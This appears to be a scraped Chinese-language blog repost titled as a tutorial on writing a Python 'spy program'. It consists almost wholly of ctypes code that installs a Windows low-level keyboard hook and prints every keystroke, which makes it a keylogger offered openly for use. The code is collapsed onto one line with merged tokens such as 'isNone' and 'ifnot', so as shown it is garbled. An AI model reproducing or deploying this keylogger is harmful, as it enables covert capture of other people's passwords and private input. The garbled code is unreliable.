Python開發一個間諜小程序(呼叫DLL)
Python開發一個間諜小程序(呼叫DLL)
資料來源: https://mp.weixin.qq.com/s?__biz=MzA5MDUyODMzOA==&mid=2447782386&idx=1&sn=b6c1f2c968f8700696ee724143c7ed57&chksm=8418decfb36f57d92b7eeffd067c85679b3499108745e08140093206b0c35877da330b5edfb7&scene=126&sessionid=1582852049&key=b3900b1fc989b015fd343fa8d4c484ab44f6c33213d9b39f9ad0196a3bf151d0ba773bc905220a05e4290a64f12dae3ac819f5d18a46e07264343028d9b101e69302c73044b243dd9c69033c8fef8bb6&ascene=1&uin=MjIwODk2NDgxNw%3D%3D&devicetype=Windows+10&version=6208006f&lang=zh_TW&exportkey=Ai8KaubzyLCLk48kVXYl5Aw%3D&pass_ticket=f1r167TSzeNSJIaf54XAaVC645GEE8h4MiHMrDGRIBQpJA6itQa9PBaZWrd6upr6
import sys from ctypes import * from ctypes.wintypes import DWORD, HHOOK, HINSTANCE, MSG, WPARAM, LPARAM user32 = CDLL("user32.dll") kernel32 = CDLL("kernel32.dll") class KBDLLHOOKSTRUCT(Structure): _fields_ = [ ('vkCode', DWORD), ('scanCode', DWORD), ('flags', DWORD), ('time', DWORD), ('dwExtraInfo', DWORD)] def uninstallHookProc(hooked): if hooked isNone: return user32.UnhookWindowsHookEx(hooked) hooked = None def hookProc(nCode, wParam, lParam): if nCode < 0: return user32.CallNextHookEx(hooked, nCode, wParam, lParam) else: if wParam == 256: if162 == lParam.contents.value: print("Ctrl pressed, call Hook uninstall()") uninstallHookProc(hooked) sys.exit(-1) capsLock = user32.GetKeyState(20) # kb_struct = cast(lParam, POINTER(KBDLLHOOKSTRUCT)) if lParam.contents.value==13: print("\n") elif capsLock: print(chr(lParam.contents.value),end="") else: print(chr(lParam.contents.value+32),end="") return user32.CallNextHookEx(hooked, nCode, wParam, lParam) def startKeyLog(): msg = MSG() user32.GetMessageA(byref(msg), 0, 0, 0) def installHookProc(hooked, pointer): hooked = user32.SetWindowsHookExA( 13, pointer, kernel32.GetModuleHandleW(), 0 ) ifnot hooked: returnFalse returnTrue HOOKPROC = WINFUNCTYPE(c_int, c_int, c_int, POINTER(DWORD)) pointer = HOOKPROC(hookProc) hooked = None if installHookProc(hooked, pointer): print("Hook installed") try: msg = MSG() user32.GetMessageA(byref(msg), 0, 0, 0) except KeyboardInterrupt as kerror: uninstallHookProc(hooked) print("Hook uninstall...") else: print("Hook installed error")